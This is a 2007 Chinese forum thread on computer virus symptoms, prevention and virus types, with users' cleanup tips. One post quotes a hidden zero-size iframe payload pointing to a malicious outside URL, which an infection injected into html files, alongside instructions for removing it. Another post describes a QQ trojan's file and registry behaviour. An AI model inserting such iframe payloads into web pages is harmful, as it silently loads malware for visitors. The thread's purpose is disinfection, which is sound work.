电脑中毒了，怎么办？web hosting

湘里妹子

程式函數看不懂，只能闭嘴了。:L

mengqing

有的病毒确实杀不了。前段时间有个病毒，藏在QQ里面，怎么都查不到。因为我有系统还原，中毒了就重启。但一起动QQ，病毒就又来了。症状：出一堆的IE线程，系统速度变得非常慢。我怀疑病毒藏QQ里，重装QQ，病毒才消失。

[ 本帖最后由 mengqinghao 于 2007-8-5 12:12 编辑 ]

管理员

来源: 天极网 2007-02-19

电脑中毒症状一览

1.平时运行好端端的电脑，却变得迟钝起来，反应缓慢，出现蓝屏甚至死机；

2.程序载入的时间变长。有些病毒能控制程序或系统的启动程序，当系统刚开始启动或是一个应用程序被载入时，这些病毒将执行它们的动作，因此要花更多的时间来载入程序；

3.可执行程序文件的大小改变了。正常情况下，这些程序应该维持固定的大小，但有些病毒会增加程序文件的大小；

4.对同样一个简单的工作，磁盘却花了要长得多的时间才能完成。例如，原本储存一页的文字只需一秒，但感染病毒可能会花更多的时间来寻找未感染的文件；

5.没有存取磁盘，但磁盘指示灯却一直在亮。硬盘的指示灯无缘无故一直在亮着，意味着电脑可能受到病毒感染了；

6.开机后出现陌生的声音、画面或提示信息，以及不寻常的错误信息或乱码。尤其是当这种信息频繁出现时，表明你的系统可能已经中毒了；

7.系统内存或硬盘的容量突然大幅减少。有些病毒会消耗可观的内存或硬盘容量，曾经执行过的程序，再次执行时，突然告诉你没有足够的内存可以利用，或者硬盘空间意外变小；

8.文件名称、扩展名、日期、属性等被更改过；

9.文件的内容改变或被加上一些奇怪的资料；

10.文件离奇消失。

（如果您的电脑有以上症状出现，请及时"就诊"）

如何预防电脑病毒

病毒的传染无非是两种方式：一是网络，二是软盘与光盘。如今由于电子邮件的盛行，通过互联网传递的病毒要远远高于后者。

1、不要轻易下载小网站的软件与程序。

2、不要光顾那些很诱惑人的小网站，因为这些网站很有可能就是网络陷阱。

3、不要随便打开某些来路不明的E-mail与附件程序。

4、安装正版杀毒软件公司提供的防火墙，并注意时时打开着。

5、不要在线启动、阅读某些文件，否则您很有可能成为网络病毒的传播者。

6、经常给自己发封E-mail，看看是否会收到第二封未属标题及附带程序的邮件。

对于软盘，光盘传染的病毒，不要随便打开程序或安装软件。可以先复制到硬盘上，接着用杀毒软件检查一遍，再执行安装或打开命令。 （资料来源：天极网）


电脑病毒的种类

引导区电脑病毒

90年代中期，最为流行的电脑病毒是引导区病毒，主要通过软盘在16位元磁盘操作系统(DOS)环境下传播。引导区病毒会感染软盘内的引导区及硬盘，而且也能够感染用户硬盘内的主引导区(MBR)。一但电脑中毒，每一个经受感染电脑读取过的软盘都会受到感染。

引导区电脑病毒是如此传播：隐藏在磁盘内，在系统文件启动以前电脑病毒已驻留在内存内。这样一来，电脑病毒就可完全控制DOS中断功能，以便进行病毒传播和破坏活动。那些设计在DOS或Windows3.1上执行的引导区病毒是不能够在新的电脑操作系统上传播，所以这类的电脑病毒已经比较罕见了。

文件型电脑病毒

文件型电脑病毒，又称寄生病毒，通常感染执行文件(.EXE)，但是也有些会感染其它可执行文件，如DLL,SCR等等...每次执行受感染的文件时，电脑病毒便会发作：电脑病毒会将自己复制到其他可执行文件，并且继续执行原有的程序，以免被用户所察觉。

复合型电脑病毒

复合型电脑病毒具有引导区病毒和文件型病毒的双重特点。

宏病毒

宏病毒专门针对特定的应用软件，可感染依附于某些应用软件内的宏指令，它可以很容易透过电子邮件附件、软盘、文件下载和群组软件等多种方式进行传播如MicrosoftWord和Excel。宏病毒采用程序语言撰写，例如VisualBasic或CorelDraw，而这些又是易于掌握的程序语言。宏病毒最先在1995年被发现，在不久后已成为最普遍的电脑病毒。

特洛伊/特洛伊木马

特洛伊或特洛伊木马是一个看似正当的程序，但事实上当执行时会进行一些恶性及不正当的活动。特洛伊可用作黑客工具去窃取用户的密码资料或破坏硬盘内的程序或数据。与电脑病毒的分别是特洛伊不会复制自己。它的传播技俩通常是诱骗电脑用户把特洛伊木马植入电脑内，例如通过电子邮件上的游戏附件等。

蠕虫病毒

蠕虫是另一种能自行复制和经由网络扩散的程序。它跟电脑病毒有些不同，电脑病毒通常会专注感染其它程序，但蠕虫是专注于利用网络去扩散。从定义上，电脑病毒和蠕虫是非不可并存的。随着互联网的普及，蠕虫利用电子邮件系统去复制，例如把自己隐藏于附件并于短时间内电子邮件发给多个用户。有些蠕虫(如CodeRed)，更会利用软件上的漏洞去扩散和进行破坏。

其他电脑病毒/恶性程序码

恶意程序通常是指带有攻击意图所编写的一段程序。这些威胁可以分成两个类别:需要宿主程序的威胁和彼此独立的威胁。前者基本上是不能独立于某个实际的应用程序、实用程序或系统程序的程序片段；后者是可以被操作系统调度和运行的自包含程序。也可以将这些软件威胁分成不进行复制工作和进行复制工作的。

秒针

电脑中招，除了电脑盲误操作之外，很多情况下是自己引狼入室，给了它授权。所以，提高警惕是很重要的，上网的时候发现任何异常都要谨慎，不要贸然点击，有的时候还要及时关闭电脑。

除此之外，一个好的防御系统是不错的选择。
我的防御体系是：诺顿企业版，360安全卫士，德国小红伞。这三个“看家狗”很厉害，让我很放心。

GS-CSLU

办法就是安装AVG Anti-Spyware 7.5.1.43+360安全卫士
前者是世界排名第一的杀毒/杀木马软件
后者是跟卡巴斯基合作的
有着两款软件保护，可以清楚99%以上的木马病毒和流氓软件
在www.new-age.com.cn/bbs有详细的介绍

神奇宝贝

如果出现了23#楼客所说的症状，应该怎么处理呢？上述所说的有好几条症状都符合我的电脑，但查毒的时候却没有查出来毒来

mengqing

什么症状啊？好多呢。

前几天中了个病毒，又学到一个病毒的隐藏方式：藏在你电脑里的html网页文件里。:o
这种病毒，只能手工杀毒。杀毒软件既发现不了，又清除不了。:Q


中毒症状：电脑中所有html和asp文件都被加了一段有害代码。比如：<IFRAME SRC="http://rrr.rfhwfhw.com/1.htm" WIDTH=0 HEIGHT=0></IFRAME>
（判断方法：使用记事本打开html文件，查看最后一段代码。PS：我电脑中某些html文件，都被加了两段了，汗一个:L ）


解决方法：（我找到的资料，原文不够详细，我稍加修改）
借用dreamweaver（我用的版本是Dreamweaver 8）的站点管理功能。
新建一个站点，目录指向硬盘根目录（补充：新建站点时，会出现两次目录指定，指定为同一个即可），（从C盘开始，然后D,E,F...）。然后ctrl+f，使用搜索替换功能，
搜索字段：<IFRAME SRC="http://rrr.rfhwfhw.com/1.htm" WIDTH=0 HEIGHT=0></IFRAME>
（这个字段可能会不一样，有时甚至是多段，即多次中毒。自己找个感染了的html，拉进记事本里，看看</html>之后的那段。一般在页末。）

替换时的选项设置：
替换：不填
查找范围：“整个当前本地站点”
搜索：“源代码”

然后开始整站替换，一小会，几万个文件都修复好了，HOHO。:lol
替换好一个盘符以后，重新修改站点属性，修改为下一个要替换的盘符，依次类推，直到所有盘符完全替换完毕为止。至此，病毒彻底消失。:victory:

[ 本帖最后由 mengqinghao 于 2007-9-13 21:39 编辑 ]

Artvine

哈哈，這叫釣魚程式，雖然簡單在htm中偷留一段http://(北大中文BBS前陣子也中此毒)，可以用大規模Search & Replace處理，但它討厭的是會擴張到每個硬碟分割區。

mengqing

嗯，这种病毒的主要攻击目标就是：网站。:-(

mengqing

首先，杀毒软件提示发现usbinte.sys病毒，提示重启后删除，可是重启之后呢，依然存在，依然是重启后删除。

详细说明及杀毒方法：

中TIMPlatform.exe木马，产生usbinte.sys病毒的清除办法（一种隐藏在QQ中的病毒）：

一，病毒的行为：
如果你的进程TIMPlatform.exe被改名为TIMPlatfrom.exe(注意两个文件字母的排序)就可能中招了。
木马运行后进驻内存调用IE（iexplore.exe）访问远程信息下载木马或其它恶意程序。
1.运行后复制自身到系统目录%System32%\visin.exe，
2.并改名QQ目录下TIMPlatform.exe为TIMPlatfrom.exe，
3.复制自身为TIMPlatform.exe，使得QQ运行时也会调用运行病毒文件，
4.此外，和之前的一些变种一样，它也释放了驱动文件%System32%\drivers\usbinte.sys。
5.创建的启动项是： [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run] "9"="%System32是%\visin.exe" （如果杀毒软件发现的早，该项目可能未建立）

二，杀毒方法：
清除步骤 ==========
首先注意，杀毒前，重启电脑后不要启动QQ程序！如果QQ设置为自动登陆，则取消。杀毒后重新恢复自动登陆设置。
1. 删除病毒文件：
%System32%\visin.exe，
%QQ%\TIMPlatform.exe，
%System32%\drivers\usbinte.sys（如果删除不了，直接进行下一步骤） 。
2. 改名QQ目录下TIMPlatfrom.exe为TIMPlatform.exe（或直接删除）。
3. 删除启动项： [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run] "9"="%System32%\visin.exe" （如果没有该项目，则直接重启电脑，重启后重复1.2.）
4. 重新启动计算机
注意：病毒文件名不一定是visin.exe、usbinte.sys也不一定在System32目录下但QQ目录下一定有TIMPlatfrom.exe和TIMPlatform.exe两个文件（有可能是隐藏的）。

[ 本帖最后由 mengqinghao 于 2007-9-18 23:03 编辑 ]